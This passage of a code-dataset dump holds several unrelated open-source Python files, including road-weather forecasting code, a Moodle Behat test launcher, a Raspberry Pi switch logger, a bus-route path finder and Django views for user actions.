(macadam.get_lt())[:nNbrVerticalLevel*iNb_timesteps]\n lTL = [] \n for i in range(0,iNb_timesteps):\n begin = i * nNbrVerticalLevel\n end = begin + nNbrVerticalLevel\n lTL.append(lTmpTL[begin:end])\n \n # Adding the informations to the header\n roadcast.set_header_value('VERSION',sRoadcast_version)\n roadcast.set_header_value('ROAD_STATION',sRoadcast_station)\n roadcast.set_header_value('PRODUCTION_DATE',fRoadcast_production_date)\n roadcast.set_header_value('LATITUDE', station.get_header()\\\n ['COORDINATE'][0])\n roadcast.set_header_value('LONGITUDE', station.get_header()\\\n ['COORDINATE'][1])\n roadcast.set_header_value('FILETYPE','roadcast')\n\n if metro_config.get_value('TL') == True:\n roadcast.set_header_value('VERTICAL_LEVELS',lDepth)\n \n\n # TODO MT: Le +30 est la pour que l'output soit au bon moment.\n # Il y a eu un probleme dans la conversion entre le C et le fortran\n # qui fait en sorte qu'il y a un decalage d'un indice. Il faudra que\n # ce soit corrige.\n npRT = wf_data.get_matrix_col('FORECAST_TIME')[:iNb_timesteps]\n npRT = npRT + 30\n npHH = wf_data.get_matrix_col('Time')[:iNb_timesteps]\n npAT = wf_data.get_matrix_col('AT')[:iNb_timesteps]\n npFA = wf_data.get_matrix_col('FA')[:iNb_timesteps]\n # 3.6 is to convert from m/s to km/h\n npWS = wf_data.get_matrix_col('WS')[:iNb_timesteps]*3.6\n npTD = wf_data.get_matrix_col('TD')[:iNb_timesteps]\n npQP_SN = wf_data.get_matrix_col('SN')[:iNb_timesteps]\n npQP_RA = wf_data.get_matrix_col('RA')[:iNb_timesteps]\n npCC = wf_data.get_matrix_col('CC')[:iNb_timesteps]\n\n\n roadcast.init_matrix(iNb_timesteps, roadcast.get_real_nb_matrix_col())\n\n # Data added to the roadcast matrix\n roadcast.set_matrix_col('RA', lRA)\n roadcast.set_matrix_col('SN', lSN)\n roadcast.set_matrix_col('RC', lRC)\n roadcast.set_matrix_col('ST', lST)\n roadcast.set_matrix_col('ROADCAST_TIME', npRT)\n roadcast.set_matrix_col('HH', npHH)\n roadcast.set_matrix_col('AT', npAT)\n roadcast.set_matrix_col('WS', npWS)\n roadcast.set_matrix_col('TD', npTD)\n roadcast.set_matrix_col('QP-SN', npQP_SN)\n roadcast.set_matrix_col('QP-RA', npQP_RA)\n roadcast.set_matrix_col('IR', lIR)\n roadcast.set_matrix_col('SF', lSF)\n roadcast.set_matrix_col('FV', lFV)\n roadcast.set_matrix_col('FC', lFC)\n roadcast.set_matrix_col('FG', lFG)\n roadcast.set_matrix_col('FA', npFA.tolist())\n roadcast.set_matrix_col('BB', lBB)\n roadcast.set_matrix_col('FP', lFP)\n roadcast.set_matrix_col('CC', npCC)\n roadcast.set_matrix_col('SST', lSST)\n\n if metro_config.get_value('TL') == True:\n roadcast.append_matrix_multiCol('TL', lTL)\n\n \n # Creation of the object Metro_data_collection for the roadcast\n lStandard_attributes = metro_config.get_value( \\\n 'DATA_ATTRIBUTE_ROADCAST_STANDARD')\n lExtended_attributes = metro_config.get_value( \\\n 'DATA_ATTRIBUTE_ROADCAST_EXTENDED') \n lAttributes = lStandard_attributes + lExtended_attributes\n \n roadcast_collection = \\\n metro_data_collection_output.\\\n Metro_data_collection_output(roadcast,lAttributes)\n\n \n # Writing of data needed for the roadcast.\n roadcast_collection.set_attribute('OBSERVATION_LENGTH',\n iObservation_len)\n roadcast_collection.set_attribute('OBSERVATION_DELTAT_T',\n fObservation_delta_t)\n roadcast_collection.set_attribute('FORECAST_NB_TIMESTEPS',\n iNb_timesteps)\n\n return roadcast_collection\n","repo_name":"jacobg0/METRoWin","sub_path":"src/frontend/executable_module/metro_model.py","file_name":"metro_model.py","file_ext":"py","file_size_in_byte":18223,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"84"} +{"seq_id":"23704769095","text":"from SelfCreateFunction.List_Node import ListNode\n\nclass Solution(object):\n def getDecimalValue(self, head):\n node_values = \"\"\n while head:\n node_values += str(head.val)\n head = head.next\n return int(node_values, 2)\n\n\nif __name__ == '__main__':\n head_val = [0]\n i_head = ListNode().Create_Node(head_val)\n\n run = Solution()\n print(run.getDecimalValue(i_head))\n","repo_name":"zxz13561/MyLeetcodeNote","sub_path":"All Problems/1290. Convert Binary Number in a Linked List to Integer.py","file_name":"1290. Convert Binary Number in a Linked List to Integer.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"12990375352","text":"from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nimport time\nimport math\n\ndef sum(x, y):\n return str(x + y)\n\n\ntry: \n link = \"https://suninjuly.github.io/selects1.html\"\n browser = webdriver.Chrome()\n browser.get(link)\n \n fnum = browser.find_element(By.CSS_SELECTOR, \"#num1\")\n snum = browser.find_element(By.CSS_SELECTOR, \"#num2\")\n\n x = int(fnum.text)\n y = int(snum.text)\n z = sum(x, y) # add numbers\n print(x)\n print(y)\n print(z)\n\n browser.find_element(By.TAG_NAME, \"select\").click() # open the dropdown list\n browser.find_element(By.CSS_SELECTOR, (f\"[value='{z}']\")).click() # select the calculated number\n\n\n button = browser.find_element(By.CSS_SELECTOR, \"button.btn\")\n button.click()\n\nfinally:\n time.sleep(5)\n browser.execute_script(\"document.title='Script executing';alert('Robots at work');\") # execute_script method, show alert\n time.sleep(3)\n browser.quit()\n\n\n\n","repo_name":"vistad/seleniumPython","sub_path":"2_2_3_dropdownAlert.py","file_name":"2_2_3_dropdownAlert.py","file_ext":"py","file_size_in_byte":1024,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"16919026291","text":"# -*- coding: utf-8 -*-\n\nimport numpy as np\n\n\nclass PredictWrapper:\n def __init__(self, fn):\n self.fn = fn\n\n def predict(self, x):\n # Note 1: We need to pass the result to the CPU so that the latent\n # distance informer class can deal with the NumPy array.\n # Note 2: Due to the Keras/PyTorch asymmetry, and the [0] index in\n # self._encoder.predict(\n # streamline[np.newaxis, ])[0]\n # in TractographyLatentSpaceDistanceInformer.compute_distances\n # we need to add yet another axis here: [np.newaxis, ]\n return (\n self.fn(x)\n .cpu()\n .detach()\n .numpy()[\n np.newaxis,\n ]\n )\n","repo_name":"scil-vital/tractolearn","sub_path":"tractolearn/utils/layer_utils.py","file_name":"layer_utils.py","file_ext":"py","file_size_in_byte":727,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"84"} +{"seq_id":"10499782454","text":"import os\nimport urllib.request, urllib.parse, urllib.error\nimport re\nimport logging\nimport gzip\nfrom tempfile import gettempdir\nfrom time import sleep\nfrom ..command import Command\nfrom ..tools import process, ProcessInThread, downloadProcessHook, question, natural_sort_key\n\n\nclass BehatCommand(Command):\n\n _arguments = [\n (\n ['-r', '--run'],\n {\n 'action': 'store_true',\n 'help': 'run the tests'\n }\n ),\n (\n ['-d', '--disable'],\n {\n 'action': 'store_true',\n 'help': 'disable Behat, runs the tests first if --run has been set. Ignored from 2.7.'\n }\n ),\n (\n ['--force'],\n {\n 'action': 'store_true',\n 'help': 'force behat re-init and reset the variables in the config file.'\n }\n ),\n (\n ['-f', '--feature'],\n {\n 'metavar': 'path',\n 'help': 'typically a path to a feature, or an argument understood by behat (see [features]: vendor/bin/behat --help). Automatically convert path to absolute path.'\n }\n ),\n (\n ['-n', '--testname'],\n {\n 'dest': 'testname',\n 'metavar': 'name',\n 'help': 'only execute the feature elements which match part of the given name or regex'\n }\n ),\n (\n ['-t', '--tags'],\n {\n 'metavar': 'tags',\n 'help': 'only execute the features or scenarios with tags matching tag filter expression'\n }\n ),\n (\n ['-j', '--no-javascript'],\n {\n 'action': 'store_true',\n 'dest': 'nojavascript',\n 'help': 'do not start Selenium and ignore Javascript (short for --tags=~@javascript). Cannot be combined with --tags or --testname.'\n }\n ),\n (\n ['-D', '--no-dump'],\n {\n 'action': 'store_false',\n 'dest': 'faildump',\n 'help': 'use the standard command without fancy screenshots or output to a directory'\n }\n ),\n (\n ['-s', '--switch-completely'],\n {\n 'action': 'store_true',\n 'dest': 'switchcompletely',\n 'help': 'force the switch completely setting. This will be automatically enabled for PHP < 5.4. Ignored from 2.7.'\n }\n ),\n (\n ['--selenium'],\n {\n 'default': None,\n 'dest': 'selenium',\n 'help': 'path to the selenium standalone server to use',\n 'metavar': 'jarfile'\n }\n ),\n (\n ['--selenium-download'],\n {\n 'action': 'store_true',\n 'dest': 'seleniumforcedl',\n 'help': 'force the download of the latest Selenium to the cache'\n }\n ),\n (\n ['--selenium-verbose'],\n {\n 'action': 'store_true',\n 'dest': 'seleniumverbose',\n 'help': 'outputs the output from selenium in the same window'\n }\n ),\n (\n ['name'],\n {\n 'default': None,\n 'help': 'name of the instance',\n 'metavar': 'name',\n 'nargs': '?'\n }\n )\n ]\n _description = 'Initialise Behat'\n\n def run(self, args):\n\n # Loading instance\n M = self.Wp.resolve(args.name)\n if not M:\n raise Exception('This is not a Moodle instance')\n\n # Check required version\n if M.branch_compare(25, '<'):\n raise Exception('Behat is only available from Moodle 2.5')\n\n # Check if installed\n if not M.get('installed'):\n raise Exception('This instance needs to be installed first')\n\n # Disable Behat\n if args.disable and not args.run:\n self.disable(M)\n return\n\n # No Javascript\n nojavascript = args.nojavascript\n if not nojavascript and not self.C.get('java') or not os.path.isfile(os.path.abspath(self.C.get('java'))):\n nojavascript = True\n logging.info('Disabling Javascript because Java is required to run Selenium and could not be found.')\n\n # If not composer.phar, install Composer\n if not os.path.isfile(os.path.join(M.get('path'), 'composer.phar')):\n logging.info('Installing Composer')\n cliFile = 'behat_install_composer.php'\n cliPath = os.path.join(M.get('path'), 'behat_install_composer.php')\n (to, headers) = urllib.request.urlretrieve('http://getcomposer.org/installer', cliPath)\n if dict(headers).get('content-encoding') == 'gzip':\n f = gzip.open(cliPath, 'r')\n content = f.read()\n f.close()\n f = open(cliPath, 'w')\n f.write(content)\n f.close()\n M.cli('/' + cliFile, stdout=None, stderr=None)\n os.remove(cliPath)\n M.cli('composer.phar', args='install', stdout=None, stderr=None)\n\n # Download selenium\n seleniumPath = os.path.expanduser(os.path.join(self.C.get('dirs.mdk'), 'selenium.jar'))\n if args.selenium:\n seleniumPath = args.selenium\n elif args.seleniumforcedl or (not nojavascript and not os.path.isfile(seleniumPath)):\n logging.info('Attempting to find a download for Selenium')\n seleniumStorageUrl = 'https://selenium-release.storage.googleapis.com/'\n url = urllib.request.urlopen(seleniumStorageUrl)\n content = url.read().decode('utf-8')\n matches = sorted(re.findall(r'[a-z0-9._-]+/selenium-server-standalone-[0-9.]+\\.jar', content, re.I),\n key=natural_sort_key)\n if len(matches) > 0:\n seleniumUrl = seleniumStorageUrl + matches[-1]\n logging.info('Downloading Selenium from %s' % seleniumUrl)\n if (logging.getLogger().level <= logging.INFO):\n urllib.request.urlretrieve(seleniumUrl, seleniumPath, downloadProcessHook)\n # Force a new line after the hook display\n logging.info('')\n else:\n urllib.request.urlretrieve(seleniumUrl, seleniumPath)\n else:\n logging.warning('Could not locate Selenium server to download')\n\n if not nojavascript and not os.path.isfile(seleniumPath):\n raise Exception('Selenium file %s does not exist')\n\n # Run cli\n try:\n\n # If Oracle, ask the user for a Behat prefix, if not set.\n prefix = M.get('behat_prefix')\n if M.get('dbtype') == 'oci' and (args.force or not prefix or len(prefix) > 2):\n while not prefix or len(prefix) > 2:\n prefix = question('What prefix would you like to use? (Oracle, max 2 chars)')\n else:\n prefix = None\n\n outputDir = self.Wp.getExtraDir(M.get('identifier'), 'behat')\n outpurUrl = self.Wp.getUrl(M.get('identifier'), extra='behat')\n\n logging.info('Initialising Behat, please be patient!')\n M.initBehat(switchcompletely=args.switchcompletely, force=args.force, prefix=prefix, faildumppath=outputDir)\n logging.info('Behat ready!')\n\n # Preparing Behat command\n cmd = ['vendor/bin/behat']\n if args.tags:\n cmd.append('--tags=\"%s\"' % (args.tags))\n\n if args.testname:\n cmd.append('--name=\"%s\"' % (args.testname))\n\n if not (args.tags or args.testname) and nojavascript:\n cmd.append('--tags ~@javascript')\n\n if args.faildump:\n if M.branch_compare(31, '<'):\n cmd.append('--format=\"progress,progress,pretty,html,failed\"')\n cmd.append('--out=\",{0}/progress.txt,{0}/pretty.txt,{0}/status.html,{0}/failed.txt\"'.format(outputDir))\n else:\n cmd.append('--format=\"moodle_progress\" --out=\"std\"')\n cmd.append('--format=\"progress\" --out=\"{0}/progress.txt\"'.format(outputDir))\n cmd.append('--format=\"pretty\" --out=\"{0}/pretty.txt\"'.format(outputDir))\n\n configcandidates = ['%s/behat/behat.yml' % (M.get('behat_dataroot'))]\n if M.branch_compare(32):\n # Since Moodle 3.2.2 behat directory is kept under $CFG->behat_dataroot for single and parallel runs.\n configcandidates.insert(0, '%s/behatrun/behat/behat.yml' % (M.get('behat_dataroot')))\n\n cmd.append('--config=%s' % (list(filter(os.path.isfile, configcandidates))[0]))\n\n # Checking feature argument\n if args.feature:\n filepath = args.feature\n if not filepath.startswith('/'):\n filepath = os.path.join(M.get('path'), filepath)\n cmd.append(filepath)\n\n cmd = ' '.join(cmd)\n\n phpCommand = '%s -S localhost:8000' % (self.C.get('php'))\n seleniumCommand = None\n if seleniumPath:\n seleniumCommand = '%s -jar %s' % (self.C.get('java'), seleniumPath)\n\n olderThan26 = M.branch_compare(26, '<')\n\n if args.run:\n logging.info('Preparing Behat testing')\n\n # Preparing PHP Server\n phpServer = None\n if olderThan26 and not M.get('behat_switchcompletely'):\n logging.info('Starting standalone PHP server')\n kwargs = {}\n kwargs['cwd'] = M.get('path')\n phpServer = ProcessInThread(phpCommand, **kwargs)\n phpServer.start()\n\n # Launching Selenium\n seleniumServer = None\n if seleniumPath and not nojavascript:\n logging.info('Starting Selenium server')\n kwargs = {}\n if args.seleniumverbose:\n kwargs['stdout'] = None\n kwargs['stderr'] = None\n else:\n # Logging Selenium to a temporary file, this can be useful, and also it appears\n # that Selenium hangs when stderr is not buffered.\n fileOutPath = os.path.join(gettempdir(), 'selenium_%s_out.log' % (M.get('identifier')))\n fileErrPath = os.path.join(gettempdir(), 'selenium_%s_err.log' % (M.get('identifier')))\n tmpfileOut = open(fileOutPath, 'w')\n tmpfileErr = open(fileErrPath, 'w')\n logging.debug('Logging Selenium output to: %s' % (fileOutPath))\n logging.debug('Logging Selenium errors to: %s' % (fileErrPath))\n kwargs['stdout'] = tmpfileOut\n kwargs['stderr'] = tmpfileErr\n seleniumServer = ProcessInThread(seleniumCommand, **kwargs)\n seleniumServer.start()\n\n logging.info('Running Behat tests')\n\n # Sleep for a few seconds before starting Behat\n if phpServer or seleniumServer:\n launchSleep = int(self.C.get('behat.launchSleep'))\n logging.debug('Waiting for %d seconds to allow Selenium and/or the PHP Server to start ' % (launchSleep))\n sleep(launchSleep)\n\n # Running the tests\n try:\n if args.faildump:\n logging.info('More output can be found at:\\n %s\\n %s', outputDir, outpurUrl)\n process(cmd, M.path, None, None)\n except KeyboardInterrupt:\n pass\n\n # Kill the remaining processes\n if phpServer and phpServer.is_alive():\n phpServer.kill()\n if seleniumServer and seleniumServer.is_alive():\n seleniumServer.kill()\n\n # Disable Behat\n if args.disable:\n self.disable(M)\n\n else:\n if args.faildump:\n logging.info('More output will be accessible at:\\n %s\\n %s', outputDir, outpurUrl)\n if olderThan26:\n logging.info('Launch PHP Server (or set $CFG->behat_switchcompletely to True):\\n %s' % (phpCommand))\n if seleniumCommand:\n logging.info('Launch Selenium (optional):\\n %s' % (seleniumCommand))\n logging.info('Launch Behat:\\n %s' % (cmd))\n\n except Exception as e:\n raise e\n\n def disable(self, M):\n logging.info('Disabling Behat')\n M.cli('admin/tool/behat/cli/util.php', '--disable')\n M.removeConfig('behat_switchcompletely')\n","repo_name":"FMCorz/mdk","sub_path":"mdk/commands/behat.py","file_name":"behat.py","file_ext":"py","file_size_in_byte":13135,"program_lang":"python","lang":"en","doc_type":"code","stars":77,"dataset":"github-code","pt":"84"} +{"seq_id":"39558752080","text":"import requests\nimport time\nimport RPi.GPIO as GPIO\n\nGPIO.setmode(GPIO.BOARD)\nswitch = 3\nGPIO.setup(switch, GPIO.IN)\n\nfor x in range(0, 10000000):\n if (GPIO.input(switch)) == True:\n\n requests.post('http://192.168.30.1/workshop/submit.php', data = {\n 'value': 1\n })\n else: \n\t requests.post('http://192.168.30.1/workshop/submit.php', data = {\n\t 'value': 0\n\t })\n\n time.sleep(0.01)\n\nGPIO.cleanup()\n","repo_name":"shakdwipeea/workshop-raspberry-pi","sub_path":"send.py","file_name":"send.py","file_ext":"py","file_size_in_byte":488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"14855110340","text":"\"\"\"\n使用python xml解析树解析xml文件,批量修改xml文件里object节点下name节点的text\n\"\"\"\nimport glob\nimport xml.etree.ElementTree as ET\npath = r'D:\\zsh\\biaozhu\\bilibli\\download\\table_tennis\\badminton\\bo\\new_xml' # xml文件夹路径\ni = 0\nfor xml_file in glob.glob(path + '/*.xml'):\n # print(xml_file)\n tree = ET.parse(xml_file)\n obj_list = tree.getroot().findall('object')\n for per_obj in obj_list:\n pre = per_obj[1]\n if per_obj[0].text == 'volant': # 错误的标签“33”\n per_obj[0].text = 'shuttle' # 修改成“44”\n i = i+1\n\n tree.write(xml_file)\nprint('共完成了{}处替换'.format(i))\n","repo_name":"zsh123abc/untils","sub_path":"utils/修改标签名/4.py","file_name":"4.py","file_ext":"py","file_size_in_byte":680,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"84"} +{"seq_id":"18458860300","text":"__author__ = 'Eleftherios Anagnostopoulos'\n__email__ = 'eanagnostopoulos@hotmail.com'\n__credits__ = [\n 'Azadeh Bararsani (Senior Researcher at Ericsson AB) - email: azadeh.bararsani@ericsson.com'\n 'Aneta Vulgarakis Feljan (Senior Researcher at Ericsson AB) - email: aneta.vulgarakis@ericsson.com'\n]\n\n\nclass MultiplePathsNode(object):\n def __init__(self, osm_id):\n self.osm_id = osm_id\n self.followed_paths = []\n\n def __str__(self):\n return str(self.osm_id)\n\n def add_followed_path(self, followed_path):\n if followed_path not in self.followed_paths:\n self.followed_paths.append(followed_path)\n\n def get_followed_paths(self):\n return self.followed_paths\n\n def update_followed_paths(self, followed_paths_of_previous_node):\n if len(followed_paths_of_previous_node) > 0:\n for followed_path_of_previous_node in followed_paths_of_previous_node:\n followed_path = followed_path_of_previous_node + [self.osm_id]\n self.add_followed_path(followed_path=followed_path)\n else:\n followed_path = [self.osm_id]\n self.followed_paths.append(followed_path)\n\n\nclass MultiplePathsSet(object):\n \"\"\"\n Following the principles of breadth-first search, the neighbors of each node are explored first,\n before moving to the next level neighbors. For this reason, a data storing structure is implemented\n in order to store the nodes whose neighbors have not yet been explored.\n \"\"\"\n def __init__(self):\n self.node_osm_ids = []\n self.nodes = []\n\n def __len__(self):\n return len(self.node_osm_ids)\n\n def __contains__(self, node_osm_id):\n \"\"\"\n Check if a node exists in the nodes list.\n\n :type node_osm_id: integer\n :return: boolean\n \"\"\"\n return node_osm_id in self.node_osm_ids\n\n def __str__(self):\n return str(self.node_osm_ids)\n\n def push(self, new_node):\n \"\"\"\n Insert a new node.\n\n :param new_node: MultiplePathsNode\n \"\"\"\n new_node_osm_id = new_node.osm_id\n self.node_osm_ids.append(new_node_osm_id)\n self.nodes.append(new_node)\n\n def pop(self):\n \"\"\"\n Remove - retrieve the first node of followed path.\n\n :return: node: MultiplePathsNode\n \"\"\"\n node = self.nodes.pop(0)\n self.node_osm_ids.remove(node.osm_id)\n return node\n\n\ndef get_edge(starting_node, ending_node, edges_dictionary):\n \"\"\"\n Get the edge_document which connects starting_node with ending_node.\n\n :param starting_node: osm_id\n :param ending_node: osm_id\n\n :param edges_dictionary: {starting_node_osm_id -> [edge_document]}\n :return: edge: edge_document\n \"\"\"\n edge = None\n starting_node_edges = edges_dictionary[starting_node]\n\n for starting_node_edge in starting_node_edges:\n if starting_node_edge.get('ending_node').get('osm_id') == ending_node:\n edge = starting_node_edge\n break\n\n return edge\n\n\ndef identify_all_paths(starting_node_osm_id, ending_node_osm_id, edges_dictionary):\n \"\"\"\n This function is capable of identifying all the possible paths connecting the\n starting with the ending node, implementing a variation of the Breadth-first\n search algorithm. Each path is represented by a list of edge_documents (waypoints),\n including details about intermediate nodes, maximum allowed speed, road type, and\n current levels of traffic density. The returned value of the function is a\n double list of edge_documents.\n\n :param starting_node_osm_id: integer\n :param ending_node_osm_id: integer\n :param edges_dictionary: {starting_node_osm_id -> [edge_document]}\n :return: waypoints: [[edge_document]]\n \"\"\"\n # Returned value\n waypoints = []\n\n # A data storing structure used in order to keep the nodes\n # whose neighbors should be considered.\n open_set = MultiplePathsSet()\n\n # A dictionary ({node_osm_id -> node}) containing nodes\n # whose neighbors have already been considered.\n closed_set = {}\n\n # starting_node is initialized and pushed into the open_set.\n starting_node = MultiplePathsNode(osm_id=starting_node_osm_id)\n starting_node.followed_paths = [[starting_node.osm_id]]\n open_set.push(new_node=starting_node)\n\n # The node in the first position of the open_set is retrieved,\n # as long as the number of stored nodes is above zero.\n while len(open_set) > 0:\n current_node = open_set.pop()\n\n # Continuation condition: ending_node has been discovered.\n if current_node.osm_id == ending_node_osm_id:\n\n # Each one of the followed paths is processed, in order to retrieve the\n # corresponding edge_documents, and added to the returned double list.\n for followed_path in current_node.get_followed_paths():\n waypoints.append(process_followed_path(\n followed_path=followed_path,\n edges_dictionary=edges_dictionary)\n )\n\n current_node.followed_paths = []\n continue\n\n # Continuation condition: current_node is ignored in case it has no neighbors,\n # or its neighbors have already been considered.\n if current_node.osm_id not in edges_dictionary or current_node.osm_id in closed_set:\n continue\n\n # Following the edges of current_node, each one of its neighbors is considered.\n for edge in edges_dictionary.get(current_node.osm_id):\n next_node_osm_id = edge.get('ending_node').get('osm_id')\n\n # Continuation condition: next_node has already been considered.\n if next_node_osm_id in closed_set:\n continue\n else:\n # Followed paths of next_node are updated and the node is pushed into the open_set,\n # so as to allow its neighbors to be considered.\n next_node = MultiplePathsNode(osm_id=next_node_osm_id)\n next_node.update_followed_paths(followed_paths_of_previous_node=current_node.get_followed_paths())\n open_set.push(new_node=next_node)\n\n # Since all its neighbors have been considered, current_node is added to the closed_set.\n closed_set[current_node.osm_id] = current_node\n\n return waypoints\n\n\ndef process_followed_path(followed_path, edges_dictionary):\n \"\"\"\n This function is able to process the nodes of followed_path and\n identify the edge_documents which connect them.\n\n :param followed_path: [osm_id]\n :param edges_dictionary: {starting_node_osm_id -> [edge_document]}\n :return: detailed_followed_path: [edge_document]\n \"\"\"\n detailed_followed_path = []\n\n for i in range(0, len(followed_path) - 1):\n starting_node = followed_path[i]\n ending_node = followed_path[i + 1]\n edge = get_edge(starting_node=starting_node, ending_node=ending_node, edges_dictionary=edges_dictionary)\n # path_entry = {'edge_id': edge.get('_id'), 'starting_node': starting_node, 'ending_node': ending_node}\n detailed_followed_path.append(edge)\n\n return detailed_followed_path\n","repo_name":"pinac0099/dynamic-bus-scheduling","sub_path":"src/route_generator/multiple_paths_finder.py","file_name":"multiple_paths_finder.py","file_ext":"py","file_size_in_byte":7181,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"84"} +{"seq_id":"13534104982","text":"import numpy as np\nimport os\nfrom os import listdir\nfrom os.path import isfile, join\nimport pandas as pd\n# importing shutil module \nimport shutil\n\n# ---- Script that moves unused images from the stimuli folder to the additional_pictures folder ---- #\n# From a set of images contained in the stimuli folder, we will keep only those that are present in the csv file \n# containing the conditions of the experiment. \n# Unused images will be moved to the additional_pictures folder.\n\n#File with the name of the images that will stay in the stimuli folder.\ncsvName= '/PicBADEconditions_Eng.csv'\n\n#File with the name of the images that will stay in the stimuli folder.\ncsvName2= '/PicBADEconditions_practice_Eng.csv'\n\n#String to the current path\nTHIS_FOLDER = os.path.dirname(os.path.abspath(__file__)) \n\n#Path to stimuli folder\nmypath = THIS_FOLDER+\"/stimuli/\" #string to the path of edf files\n\n#Path where we gonna move the pictures that are not used\notherPic = THIS_FOLDER+\"/additional_pictures/\" #string to the path of edf files\n\n\n#Get list of pictures, that will be used, from the conditions file\ndef GetListPictures(filePath):\n df = pd.read_csv(filePath).fillna(0)\n arr = np.array(df[['img_1','img_2','img_3']])\n arr = np.reshape(arr,(arr.shape[0]*arr.shape[1]))\n arr.sort()\n return arr\n #print(\"List of desired pictures: \", arr)\n\narr1 = GetListPictures(THIS_FOLDER+csvName)\narr2 = GetListPictures(THIS_FOLDER+csvName2)\narr = np.append(arr1,arr2)\n\n#Get list of all pictures that are currently in the stimuli folder\nonlyfiles = [f for f in listdir(mypath) if isfile(join(mypath, f))]\nonlyfiles.sort()\n#print(\"List of all pictures\",onlyfiles)\n\n#Move pictures that are not in the conditions file\nfor i in range(len(onlyfiles)):\n myPic = mypath+onlyfiles[i] #string path to the file\n namePic = \"stimuli/\"+onlyfiles[i]\n if namePic not in arr:\n # Move the content of \n # # source to destination \n shutil.move(myPic, otherPic)\n\nprint(\"Done\")","repo_name":"carodak/BADE-Images-Pre","sub_path":"extract_pictures.py","file_name":"extract_pictures.py","file_ext":"py","file_size_in_byte":1984,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"16725782069","text":"from datetime import datetime\n\nfrom django.contrib import messages\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.db.models import Q\nfrom django.http.response import Http404, HttpResponseRedirect\nfrom django.urls.base import reverse, reverse_lazy\nfrom django.utils.functional import cached_property\nfrom django.utils.translation import gettext as _\nfrom django.views import View\nfrom django.views.generic import CreateView, DetailView, ListView\nfrom django.views.generic.detail import SingleObjectMixin\nfrom django.views.generic.edit import DeletionMixin, UpdateView\n\nfrom aldryn_apphooks_config.mixins import AppConfigMixin\nfrom aldryn_apphooks_config.utils import get_app_instance\nfrom cms.models import Page\nfrom privates.views import PrivateMediaView\nfrom view_breadcrumbs import BaseBreadcrumbMixin\n\nfrom open_inwoner.cms.collaborate.cms_apps import CollaborateApphook\nfrom open_inwoner.components.utils import RenderableTag\nfrom open_inwoner.htmx.views import HtmxTemplateTagModelFormView\nfrom open_inwoner.utils.logentry import get_verbose_change_message\nfrom open_inwoner.utils.mixins import ExportMixin\nfrom open_inwoner.utils.views import CommonPageMixin, LogMixin\n\nfrom ..forms import ActionForm, ActionListForm\nfrom ..models import Action\n\n\nclass ActionsEnabledMixin(AppConfigMixin):\n def dispatch(self, request, *args, **kwargs):\n self.namespace, self.config = get_app_instance(request)\n request.current_app = self.namespace\n\n if self.config and not self.config.actions:\n raise Http404(\"actions not enabled\")\n\n return super().dispatch(request, *args, **kwargs)\n\n\nclass BaseActionFilter:\n \"\"\"\n For when in the template the action tag is used. This will filter the actions correctly.\n \"\"\"\n\n def get_actions(self, actions):\n if self.request.GET.get(\"end_date\"):\n end_date = datetime.strptime(\n self.request.GET.get(\"end_date\"), \"%d-%m-%Y\"\n ).date()\n actions = actions.filter(end_date=end_date)\n if self.request.GET.get(\"is_for\"):\n actions = actions.filter(is_for=self.request.GET.get(\"is_for\"))\n if self.request.GET.get(\"status\"):\n actions = actions.filter(status=self.request.GET.get(\"status\"))\n return actions\n\n\nclass ActionListView(\n ActionsEnabledMixin,\n LoginRequiredMixin,\n CommonPageMixin,\n BaseBreadcrumbMixin,\n BaseActionFilter,\n ListView,\n):\n template_name = \"pages/profile/actions/list.html\"\n model = Action\n\n @cached_property\n def crumbs(self):\n return [\n (_(\"Mijn profiel\"), reverse(\"profile:detail\")),\n (_(\"Mijn acties\"), reverse(\"profile:action_list\")),\n ]\n\n def get_queryset(self):\n base_qs = super().get_queryset()\n return (\n base_qs.visible().connected(user=self.request.user).select_related(\"is_for\")\n )\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context[\"action_form\"] = ActionListForm(\n data=self.request.GET,\n users=self.get_queryset().values_list(\"is_for_id\", flat=True),\n )\n\n actions = self.get_actions(self.get_queryset())\n paginator, page, queryset, is_paginated = self.paginate_queryset(actions, 10)\n context[\"paginator\"] = paginator\n context[\"page_obj\"] = page\n context[\"is_paginated\"] = is_paginated\n context[\"actions\"] = queryset\n context[\"show_plans\"] = (\n Page.objects.published()\n .filter(application_namespace=CollaborateApphook.app_name)\n .exists()\n )\n\n return context\n\n\nclass ActionUpdateView(\n ActionsEnabledMixin,\n LogMixin,\n LoginRequiredMixin,\n CommonPageMixin,\n BaseBreadcrumbMixin,\n UpdateView,\n):\n template_name = \"pages/profile/actions/edit.html\"\n model = Action\n slug_field = \"uuid\"\n slug_url_kwarg = \"uuid\"\n form_class = ActionForm\n success_url = reverse_lazy(\"profile:action_list\")\n\n @cached_property\n def crumbs(self):\n return [\n (_(\"Mijn profiel\"), reverse(\"profile:detail\")),\n (_(\"Mijn acties\"), reverse(\"profile:action_list\")),\n (\n _(\"Bewerk {}\").format(self.object.name),\n reverse(\"profile:action_edit\", kwargs=self.kwargs),\n ),\n ]\n\n def get_queryset(self):\n base_qs = super().get_queryset()\n return base_qs.visible().connected(user=self.request.user)\n\n def get_form_kwargs(self):\n kwargs = super().get_form_kwargs()\n kwargs.update(user=self.request.user)\n return kwargs\n\n def form_valid(self, form):\n self.object = form.save(self.request.user)\n\n # log if the action was changed\n if form.changed_data:\n changed_message = get_verbose_change_message(form=form)\n self.log_change(self.object, changed_message)\n return HttpResponseRedirect(self.get_success_url())\n\n\nclass ActionUpdateStatusTagView(\n LogMixin, LoginRequiredMixin, HtmxTemplateTagModelFormView\n):\n model = Action\n fields = (\"status\",)\n slug_field = \"uuid\"\n slug_url_kwarg = \"uuid\"\n template_tag = RenderableTag(\"action_tags\", 